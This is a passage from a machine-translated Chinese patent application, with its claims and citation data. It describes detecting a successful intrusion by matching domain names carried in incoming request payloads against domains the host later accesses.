As can be seen from the above description, by using the method for detecting an attack provided by the embodiment of the present application, whether the host is attacked is determined by combining the first domain name included in the first request message and at least one domain name accessed by the host. Under the attack scene that an attacker adopts the use vulnerability to invade the host, and the vulnerability allows the attacker to directly execute the system command on the host, the detection mechanism of the scheme is identical with the attack mode of the attacker, so that the scheme can accurately detect the attack on the host.
Moreover, by using the scheme of the embodiment of the application, the attack message is identified by combining the weblog and the host log, namely: the attack message identified by the scheme is an attack message with successful attack, so that the scheme is utilized, the alarm is not triggered on the attack message without successful attack, and the false alarm is reduced.
Referring to fig. 4, fig. 4 is a signaling interaction diagram of an attack detection method according to an embodiment of the present application. The method for detecting the attack shown in fig. 4 is applied to a system for detecting the attack, and the system for detecting the attack comprises a host, a security device and a detection device. In one example, the system for detecting attacks is deployed in the network scenario corresponding to fig. 2b, namely: the system for detecting attacks comprises: host 102, security device 103, and integrated analysis device 104. In yet another example, the system for detecting attacks is deployed in the network scenario corresponding to fig. 2c, namely: the system for detecting attacks comprises: host 102, security device 103, and cloud analytics device 105.
The method of detecting an attack shown in fig. 4 includes steps S201-S204.
S201: the security device sends a weblog of the host to the detection device, wherein the weblog comprises parameter information of a first request message, the first request message is a message received by the host from other devices, and the parameter information comprises a first domain name included in a load part of the first request message.
S202: and the host sends a host log of the host to the detection device, wherein the host log comprises at least one domain name accessed by the host.
S203: and the detection equipment receives the weblog sent by the security equipment and receives the host log sent by the host.
S204: and the detection equipment generates alarm information when the at least one domain name comprises the first domain name, wherein the alarm information is used for indicating that the host is attacked.
With respect to the specific implementation of S201 to S204, reference may be made to the relevant description section in S101 to S103 above, and the description is not repeated here.
Based on the method for detecting the attack provided by the embodiment, the embodiment of the application also provides a corresponding device.
Referring to fig. 5, the structure of a detection device according to an embodiment of the present application is shown. The detection device is used for executing the attack detection method provided by the method embodiment.
The detection device 500 shown in fig. 5 includes an acquisition module 501 and a processing module 502.
In one example, the detection apparatus 500 shown in fig. 5 is applied to a detection device, for which case:
the obtaining module 501 is configured to obtain a weblog of a host, where the weblog includes parameter information of a first request packet, where the first request packet is a request packet received by the host from another device, and the parameter information includes a first domain name included in a payload portion of the first request packet; the obtaining module 501 is further configured to obtain a host log of the host, where the host log includes at least one domain name accessed by the host; the processing module 502 is configured to generate alarm information if the at least one domain name includes the first domain name, where the alarm is used to indicate that the host is attacked.
In a possible implementation manner, the parameter information further includes a time when the host receives the first request packet, the host log further includes a time when each domain name in the at least one domain name corresponds to a time when the host accesses the second domain name, and the at least one domain name includes the second domain name.
In a possible implementation manner, if the at least one domain name includes the first domain name, the processing module 502 is configured to: and if the at least one domain name comprises the first domain name and the moment corresponding to the first domain name in the host log is later than the moment when the host receives the first request message, generating the alarm information.
In a possible implementation manner, if the at least one domain name includes the first domain name and the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request packet, the processing module 502 is configured to: and if the at least one domain name comprises the first domain name, the moment corresponding to the first domain name included in the host log is later than the moment when the host receives the first request message, and the difference between the moment corresponding to the first domain name and the moment when the host receives the first request message included in the host log is smaller than or equal to a preset time threshold, generating the alarm information.
In one possible implementation manner, the detection device is integrated in the host, and the obtaining module 501 is configured to: obtaining a weblog of the host through a hook network function; and acquiring a host log of the host through a shell execution process in a hook operating system.
In a possible implementation manner, the detecting device is another independent computer device connected to the host through a network, and the acquiring module 501 is configured to: receiving the weblog sent by a security device, wherein the security device is deployed between the other devices and the host; and receiving the host log sent by the host.
In one possible implementation, the detection device, the security device, and the host are located within the same local area network.
In one possible implementation, the detection device is deployed in the internet.
In one possible implementation, the processing module 502 is further configured to: and outputting the alarm information.
In a possible implementation manner, the parameter information further includes the payload portion and/or a destination IP address of the first request packet, and the alarm information further includes the payload portion and/or the destination IP address of the first request packet included in the parameter information.
In a possible implementation manner, the host log further includes an IP address of the host and/or a log record corresponding to each domain name in the at least one domain name, and the alarm information further includes an IP address of the host and/or a log record corresponding to the first domain name included in the host log.
In yet another example, the detection apparatus 500 shown in fig. 5 is integrated in a host, for which case:
the obtaining module 501 is configured to obtain a weblog of the host, where the weblog includes parameter information of a first request packet, where the first request packet is a request packet received by the host from another device, and the parameter information includes a first domain name included in a payload portion of the first request packet; the obtaining module 501 is further configured to obtain a host log of the host, where the host log includes at least one domain name accessed by the host; a processing module 502, configured to generate alarm information if the at least one domain name includes the first domain name, where the alarm information is used to indicate that the host is attacked.
In one possible implementation, the obtaining module 501 is configured to obtain a weblog of the host through hooking a hook network function, and obtain a host log of the host through executing a shell in a hook operating system.
Since the detection apparatus 500 is an apparatus corresponding to the method for detecting an attack provided in the above method embodiment, the specific implementation of each unit of the apparatus 500 is the same as the above method embodiment, and therefore, with respect to the specific implementation of each unit of the apparatus 500, reference may be made to the description of the above method embodiment, which is not repeated herein.
It should be noted that, the hardware structure of the aforementioned detection apparatus 500 may be the structure shown in fig. 6, and fig. 6 is a schematic structural diagram of an apparatus according to an embodiment of the present application.
Referring to fig. 6, an apparatus 600 includes: a processor 610, a communication interface 620, and a memory 630. Where the number of processors 610 in device 600 may be one or more, one processor is illustrated in fig. 6. In an embodiment of the present application, processor 610, communication interface 620, and memory 630 may be connected by a bus system or otherwise, as shown in FIG. 6 by way of example as bus system 640.
The processor 610 may be a central processing unit (central processing unit, CPU), a network processor (network processor, NP) or a combination of CPU and NP. The processor 610 may further include a hardware chip. The hardware chip may be an application-specific integrated circuit (ASIC), a programmable logic device (programmable logic device, PLD), or a combination thereof. The PLD may be a complex programmable logic device (complex programmable logic device, CPLD), a field-programmable gate array (field-programmable gate array, FPGA), general-purpose array logic (generic array logic, GAL), or any combination thereof.
Memory 630 may include volatile memory (English) such as random-access memory (RAM); the memory 630 may also include a nonvolatile memory (english: non-volatile memory), such as a flash memory (english: flash memory), a hard disk (HDD) or a Solid State Drive (SSD); memory 630 may also include combinations of the above types of memory. The memory 630 can store, for example, a weblog of the host and a host log of the host.
Memory 630 optionally stores an operating system and programs, executable modules or data structures, or a subset thereof, or an extended set thereof, wherein the programs may include various operational instructions for performing various operations. The operating system may include various system programs for implementing various underlying services and handling hardware-based tasks. The processor 610 may read the program in the memory 630 to implement the method for detecting an attack according to the embodiment of the present application.
Bus system 640 may be a peripheral component interconnect (peripheral component interconnect, PCI) bus or an extended industry standard architecture (extended industry standard architecture, EISA) bus, among others. Bus system 640 may be divided into an address bus, a data bus, a control bus, and the like. For ease of illustration, only one thick line is shown in fig. 6, but not only one bus or one type of bus.
The embodiments of the present application also provide a computer-readable storage medium comprising instructions or a computer program which, when run on a computer, causes the computer to perform the method of detecting an attack provided by the above embodiments.
The embodiments of the present application also provide a computer program product comprising instructions or a computer program which, when run on a computer, cause the computer to perform the method of detecting an attack provided by the above embodiments.
The terms "first," "second," "third," "fourth" and the like in the description and in the claims and in the above drawings, if any, are used for distinguishing between similar objects and not necessarily for describing a particular sequential or chronological order. It is to be understood that the data so used may be interchanged where appropriate such that the embodiments described herein may be implemented in other sequences than those illustrated or otherwise described herein. Furthermore, the terms "comprises," "comprising," and "having," and any variations thereof, are intended to cover a non-exclusive inclusion, such that a process, method, system, article, or apparatus that comprises a list of steps or elements is not necessarily limited to those steps or elements expressly listed but may include other steps or elements not expressly listed or inherent to such process, method, article, or apparatus.
It will be clear to those skilled in the art that, for convenience and brevity of description, specific working procedures of the above-described systems, apparatuses and units may refer to corresponding procedures in the foregoing method embodiments, which are not repeated herein.
In the several embodiments provided in the present application, it should be understood that the disclosed systems, devices, and methods may be implemented in other manners. For example, the above-described apparatus embodiments are merely illustrative, e.g., the division of units is merely a logical service division, and there may be additional divisions in actual implementation, e.g., multiple units or components may be combined or integrated into another system, or some features may be omitted, or not performed. Alternatively, the coupling or direct coupling or communication connection shown or discussed with each other may be an indirect coupling or communication connection via some interfaces, devices or units, which may be in electrical, mechanical or other form.
The units described as separate units may or may not be physically separate, and units shown as units may or may not be physical units, may be located in one place, or may be distributed over a plurality of network units. Some or all of the units may be selected according to actual needs to achieve the purpose of the solution of this embodiment.
In addition, each service unit in the embodiments of the present application may be integrated in one processing unit, or each unit may exist alone physically, or two or more units may be integrated in one unit. The integrated units may be implemented in hardware or in software business units.
The integrated units, if implemented in the form of software business units and sold or used as stand-alone products, may be stored in a computer readable storage medium. Based on such understanding, the technical solution of the present application may be embodied in essence or a part contributing to the prior art or all or part of the technical solution in the form of a software product stored in a storage medium, including several instructions for causing a computer device (which may be a personal computer, a server, or a network device, etc.) to perform all or part of the steps of the methods of the embodiments of the present application. And the aforementioned storage medium includes: a U-disk, a removable hard disk, a Read-Only Memory (ROM), a random access Memory (RAM, random Access Memory), a magnetic disk, or an optical disk, or other various media capable of storing program codes.
Those skilled in the art will appreciate that in one or more of the examples described above, the services described herein may be implemented in hardware, software, firmware, or any combination thereof. When implemented in software, the services may be stored in a computer-readable medium or transmitted as one or more instructions or code on a computer-readable medium. Computer-readable media includes both computer storage media and communication media including any medium that facilitates transfer of a computer program from one place to another. A storage media may be any available media that can be accessed by a general purpose or special purpose computer.
The objects, technical solutions and advantageous effects of the present application have been described in further detail in the above embodiments, and it should be understood that the above are only embodiments of the present application.
The above embodiments are only for illustrating the technical solution of the present application, and not for limiting the same; although the application has been described in detail with reference to the foregoing embodiments, it will be understood by those of ordinary skill in the art that: the technical scheme described in the foregoing embodiments can be modified or some technical features thereof can be replaced by equivalents; such modifications and substitutions do not depart from the spirit of the application.

Claims (28)

1. A method of detecting an attack, applied to a detection device, the method comprising:
acquiring a weblog of a host, wherein the weblog comprises parameter information of a first request message, the first request message is a request message received by the host from other equipment, and the parameter information comprises a first domain name included in a load part of the first request message;
obtaining a host log of the host, wherein the host log comprises at least one domain name accessed by the host;
and if the at least one domain name comprises the first domain name, generating alarm information, wherein the alarm is used for indicating that the host is attacked.
2. The method of claim 1, wherein the parameter information further includes a time when the host receives the first request message, the host log further includes a time when each domain name in the at least one domain name corresponds to a time when a second domain name in the host log corresponds to a time when the host accesses the second domain name, and the at least one domain name includes the second domain name.
3. The method of claim 2, wherein generating the alert message if the at least one domain name includes the first domain name comprises:
And if the at least one domain name comprises the first domain name and the moment corresponding to the first domain name in the host log is later than the moment when the host receives the first request message, generating the alarm information.
4. The method according to claim 3, wherein generating the alert information if the at least one domain name includes the first domain name and the time corresponding to the first domain name included in the host log is later than the time when the first request message is received by the host includes:
and if the at least one domain name comprises the first domain name, the moment corresponding to the first domain name included in the host log is later than the moment when the host receives the first request message, and the difference between the moment corresponding to the first domain name and the moment when the host receives the first request message included in the host log is smaller than or equal to a preset time threshold, generating the alarm information.
5. The method of any of claims 1-4, wherein the detection device is integrated in the host, and wherein the obtaining a weblog of the host comprises:
Obtaining a weblog of the host through a hook network function;
the obtaining the host log of the host includes:
and acquiring a host log of the host through a shell execution process in a hook operating system.
6. The method of any of claims 1-4, wherein the detection device is another independent computer device in network connection with the host, the obtaining a web log of the host, comprising:
receiving the weblog sent by a security device, wherein the security device is deployed between the other devices and the host;
the obtaining the host log of the host includes:
and receiving the host log sent by the host.
7. The method of claim 6, wherein the detection device, the security device, and the host are located within the same local area network.
8. The method of claim 6, wherein the detection device is deployed in the internet.
9. The method according to claim 1, wherein the parameter information further comprises a destination IP address of the first request message and/or the payload portion, and the alarm information further comprises a destination IP address of the first request message and/or the payload portion included in the parameter information.
10. The method according to claim 1 or 9, wherein the host log further comprises an IP address of the host and/or a log record corresponding to each domain name of the at least one domain name, and the alarm information further comprises an IP address of the host and/or a log record corresponding to the first domain name included in the host log.
11. A system for detecting an attack, the system comprising: the system comprises a security device, a host and a detection device;
the security device is configured to send a weblog of the host to the detection device, where the weblog includes parameter information of a first request packet, where the first request packet is a packet received by the host from another device, and the parameter information includes a first domain name included in a payload portion of the first request packet;
the host is configured to send a host log of the host to the detection device, where the host log includes at least one domain name accessed by the host;
the detection device is configured to receive the weblog sent by the security device, and receive the host log sent by the host, and generate alarm information when the at least one domain name includes the first domain name, where the alarm is used to indicate that the host is attacked.
12. The system of claim 11, wherein the parameter information further includes a time when the host receives the first request message, the host log further includes a time when each domain name in the at least one domain name corresponds to a time when a second domain name in the host log corresponds to a time when the host accesses the second domain name, and the at least one domain name includes the second domain name.
13. The system of claim 12, wherein the detection device is configured to:
and generating the alarm information under the condition that the at least one domain name comprises the first domain name and the moment corresponding to the first domain name, which is included in the host log, is later than the moment when the host receives the first request message.
14. The system of claim 13, wherein the detection device is configured to:
and generating the alarm information under the condition that the at least one domain name comprises the first domain name, the moment corresponding to the first domain name included in the host log is later than the moment when the host receives the first request message, and the difference between the moment corresponding to the first domain name and the moment when the host receives the first request message included in the host log is smaller than or equal to a preset time threshold.
15. The system of any of claims 11-14, wherein the host obtains a host log of the host by executing a procedure through a shell in a hook operating system.
16. The system of any of claims 11-15, wherein the detection device, the security device, and the host are located within the same local area network.
17. The system of any one of claims 11-15, wherein the detection device is deployed in the internet.
18. A detection device integrated in a host, the detection device comprising:
the system comprises an acquisition module, a processing module and a processing module, wherein the acquisition module is used for acquiring a weblog of the host, the weblog comprises parameter information of a first request message, the first request message is a request message received by the host from other equipment, and the parameter information comprises a first domain name included in a load part of the first request message;
the acquisition module is further configured to acquire a host log of the host, where the host log includes at least one domain name accessed by the host;
and the processing module is used for generating alarm information if the at least one domain name comprises the first domain name, wherein the alarm information is used for indicating that the host is attacked.
19. The apparatus of claim 18, wherein the obtaining module is configured to obtain the weblog of the host by hooking a hook network function, and obtain the host log of the host by executing a shell in a hook operating system.
20. A detection apparatus for use in a detection device, the apparatus comprising:
the system comprises an acquisition module, a processing module and a processing module, wherein the acquisition module is used for acquiring a weblog of a host, the weblog comprises parameter information of a first request message, the first request message is a request message from other equipment, which is received by the host, and the parameter information comprises a first domain name included in a load part of the first request message;
the acquisition module is further configured to acquire a host log of the host, where the host log includes at least one domain name accessed by the host;
and the processing module is used for generating alarm information if the at least one domain name comprises the first domain name, wherein the alarm is used for indicating that the host is attacked.
21. The apparatus of claim 20, wherein the parameter information further comprises a time when the first request message is received by the host, the host log further comprises a time when each domain name in the at least one domain name corresponds to a time when a second domain name in the host log corresponds to a time when the second domain name is accessed by the host, and the at least one domain name comprises the second domain name.
22. The apparatus of claim 21, wherein the processing module is configured to, if the at least one domain name includes the first domain name:
and if the at least one domain name comprises the first domain name and the moment corresponding to the first domain name in the host log is later than the moment when the host receives the first request message, generating the alarm information.
23. The apparatus of claim 22, wherein the processing module is configured to, if the at least one domain name includes the first domain name and the time corresponding to the first domain name included in the host log is later than the time when the first request message is received by the host:
and if the at least one domain name comprises the first domain name, the moment corresponding to the first domain name included in the host log is later than the moment when the host receives the first request message, and the difference between the moment corresponding to the first domain name and the moment when the host receives the first request message included in the host log is smaller than or equal to a preset time threshold, generating the alarm information.
24. The apparatus according to any of claims 20-23, wherein the detection device is another independent computer device in network connection with the host, the acquisition module being configured to:
receiving the weblog sent by a security device, wherein the security device is deployed between the other devices and the host;
and receiving the host log sent by the host.
25. The apparatus of claim 24, wherein the detection device, the security device, and the host are located within the same local area network.
26. The apparatus of claim 24, wherein the detection device is deployed in the internet.
27. An apparatus, comprising: a processor and a memory;
the memory is used for storing instructions or computer programs;
the processor being adapted to execute the instructions or the computer program to perform the method of any of claims 1-10.
28. A computer readable storage medium comprising instructions or a computer program which, when run on a computer, causes the computer to perform the method of any of the preceding claims 1-10.
CN202210493521.XA 2022-05-07 2022-05-07 Attack detection method and device Pending CN117061139A (en)

Priority Applications (2)

Application Number Priority Date Filing Date Title
CN202210493521.XA CN117061139A (en) 2022-05-07 2022-05-07 Attack detection method and device
PCT/CN2023/087493 WO2023216792A1 (en) 2022-05-07 2023-04-11 Attack detection method, and apparatus

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202210493521.XA CN117061139A (en) 2022-05-07 2022-05-07 Attack detection method and device

Publications (1)

Publication Number Publication Date
CN117061139A true CN117061139A (en) 2023-11-14

Family

ID=88663253

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202210493521.XA Pending CN117061139A (en) 2022-05-07 2022-05-07 Attack detection method and device

Country Status (2)

Country Link
CN (1) CN117061139A (en)
WO (1) WO2023216792A1 (en)

Family Cites Families (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US9661008B2 (en) * 2013-02-21 2017-05-23 Nippon Telegraph And Telephone Corporation Network monitoring apparatus, network monitoring method, and network monitoring program
CN108667854A (en) * 2018-06-29 2018-10-16 北京奇虎科技有限公司 Network hole detection method and device, network hole automated pubilication system
CN108833185B (en) * 2018-06-29 2021-01-12 北京奇虎科技有限公司 Network attack route restoration method and system
CN108471429B (en) * 2018-06-29 2021-10-15 北京奇虎科技有限公司 Network attack warning method and system
CN110336770A (en) * 2019-04-04 2019-10-15 平安科技(深圳)有限公司 Method, apparatus, equipment and the storage medium of long-range monitoring loophole
JP7380473B2 (en) * 2020-07-29 2023-11-15 株式会社デンソー security monitoring system
CN112543177A (en) * 2020-10-26 2021-03-23 西安交大捷普网络科技有限公司 Network attack detection method and device

Also Published As

Publication number Publication date
WO2023216792A1 (en) 2023-11-16

Similar Documents

Publication Publication Date Title
US11082436B1 (en) System and method for offloading packet processing and static analysis operations
US11550560B2 (en) Enhanced device updating
US10445502B1 (en) Susceptible environment detection system
US10873597B1 (en) Cyber attack early warning system
JP6441957B2 (en) Systems, devices, and methods that automatically validate exploits on suspicious objects and highlight display information associated with the proven exploits
EP3111330B1 (en) System and method for verifying and detecting malware
WO2021077987A1 (en) Security vulnerability defense method and device
CN108809890B (en) Vulnerability detection method, test server and client
US20180191751A1 (en) Identifying an attacked computing device
CN111400722B (en) Method, apparatus, computer device and storage medium for scanning small program
CN106936791B (en) Method and device for intercepting malicious website access
JP6086423B2 (en) Unauthorized communication detection method by collating observation information of multiple sensors
EP3935807A1 (en) Behavior based profiling
US11558401B1 (en) Multi-vector malware detection data sharing system for improved detection
US20040030931A1 (en) System and method for providing enhanced network security
US10721148B2 (en) System and method for botnet identification
CN114172881B (en) Network security verification method, device and system based on prediction
CN114281547B (en) Data message processing method and device, electronic equipment and storage medium
CN117061139A (en) Attack detection method and device
CN114785621A (en) Vulnerability detection method and device, electronic equipment and computer readable storage medium
CN114257604A (en) Data processing method and system
TW201633205A (en) Systems and methods for malicious code detection
KR102001814B1 (en) A method and apparatus for detecting malicious scripts based on mobile device
CN114285660B (en) Honey net deployment method, device, equipment and medium
JP2012150658A (en) Information processing device, system, communication monitoring method and program

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination